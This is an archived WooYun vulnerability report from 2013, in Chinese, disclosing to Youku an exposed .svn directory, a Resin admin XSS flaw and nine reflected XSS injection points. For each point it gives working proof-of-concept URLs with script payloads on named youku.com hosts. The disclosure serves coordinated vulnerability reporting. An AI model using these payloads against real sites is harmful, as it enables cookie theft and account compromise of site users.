当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033571

漏洞标题:优酷信息泄露和配置不当及一些反射xss漏洞

相关厂商:优酷

漏洞作者: Spid3r

提交时间:2013-08-06 10:20

修复时间:2013-09-20 10:21

公开时间:2013-09-20 10:21

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-06: 细节已通知厂商并且等待厂商处理中
2013-08-06: 厂商已经确认,细节仅向厂商公开
2013-08-16: 细节向核心白帽子及相关领域专家公开
2013-08-26: 细节向普通白帽子公开
2013-09-05: 细节向实习白帽子公开
2013-09-20: 细节向公众公开

简要描述:

好好学习,天天向上~

详细说明:

0x01.
信息泄露

http://events.youku.com/acer/.svn/entries


http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=apple0912_windows.ics


0x02.
Resin Professional 3.1.3版本存在XSS
http://vq.youku.com/resin-admin/digest.php
传递给resin-admin/digest.php脚本的"digest_username"和"digest_realm"参数的输入在返回用户之前缺少充分过滤
0x03.
多处反射xss,可盗cookies
1.

http://v.youku.com/v_show/id_XNTg2ODg3ODcy.html?f=19400289&o=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E;//


这个xss影响到的url很多,目测几百个... 只列出10个.
http://v.youku.com/v_show/id_XNTg2ODg4MzMy.html?f=19400289&o=0
http://v.youku.com/v_show/id_XNTg2ODg3ODcy.html?f=19400289&o=0
http://v.youku.com/v_show/id_XNTg2ODg3OTM2.html?f=19400289&o=0
http://v.youku.com/v_show/id_XNTg2ODg4MjQ0.html?f=19400289&o=0
http://v.youku.com/v_show/id_XNTkwNTcwNjA4.html?f=19400287&o=0
http://v.youku.com/v_show/id_XNTg2ODg2Njg4.html?f=19400289&o=0
http://v.youku.com/v_show/id_XNTkwNTcwOTEy.html?f=19400287&o=0
http://v.youku.com/v_show/id_XNTg3NTc5NjE2.html?f=19400287&o=0
http://v.youku.com/v_show/id_XNTg3NTc5Njk2.html?f=19400287&o=0
http://v.youku.com/v_show/id_XNTg0NTU3NDA4.html?f=19400284&o=0
2.

http://i.youku.com/u/UNDE2NTYzMzky/videos/?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


同样这个xss影响到的url也很多,目测几百个.... 只列出10个.
http://i.youku.com/u/UMTA5NTc5NzY
http://i.youku.com/u/UMTMwMzg5Mg
http://i.youku.com/u/UMzM3NDM5MzM2
http://i.youku.com/u/UMjc5MzI5NDA
http://i.youku.com/u/UNDA5NDkzOTEy/
http://i.youku.com/u/UMzg1OTc3MDU2
http://i.youku.com/u/UMTM2NzgyNzE2/
http://i.youku.com/u/UMTcyNzk3ODM2/
http://i.youku.com/u/UNTY5MDQ5Njcy/
http://i.youku.com/u/UMzUxNzk5Njg0/
3.

http://i.youku.com/u/share/?url=This%20is%20a%20test%22%3E%3C/textarea%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


4.

http://oreo.youku.com/api/pop_video.php?vid=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


5.

http://comments.youku.com/comments/comments?id=73500&bind_type=1&pl=5&width=0&height=0&minisite=0&color=1&backurl=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E;//


id、backurl 2个参数
6.

http://minisite2.youku.com/activities_fee/www/integral/continue_sign_in.php?callback=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


7.

http://i.youku.com/u/search?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


8.

http://www.youku.com/playlist_show/id_19485175.html?page=1&mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&ascending=1


9.

http://v.youku.com/v_map?lng=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&lat=41.8087005615


lng lat 2个参数

漏洞证明:

0x01

1.jpg


20.jpg


0x02

3.jpg


把Resin更新版本.
0x03

1.jpg


2.jpg


4.jpg


5.jpg" /<img src="https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201308/05233307174506f09595ace9e47e767dcb232994.jpg" alt="10.jpg

>

6.jpg


7.jpg


8.jpg


9.jpg


10.jpg


111.jpg


修复方案:

习惯了未通过... 你懂的..

版权声明:转载请注明来源 Spid3r@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-06 10:35

厂商回复:

修复中

最新状态:

暂无


漏洞评价:

评论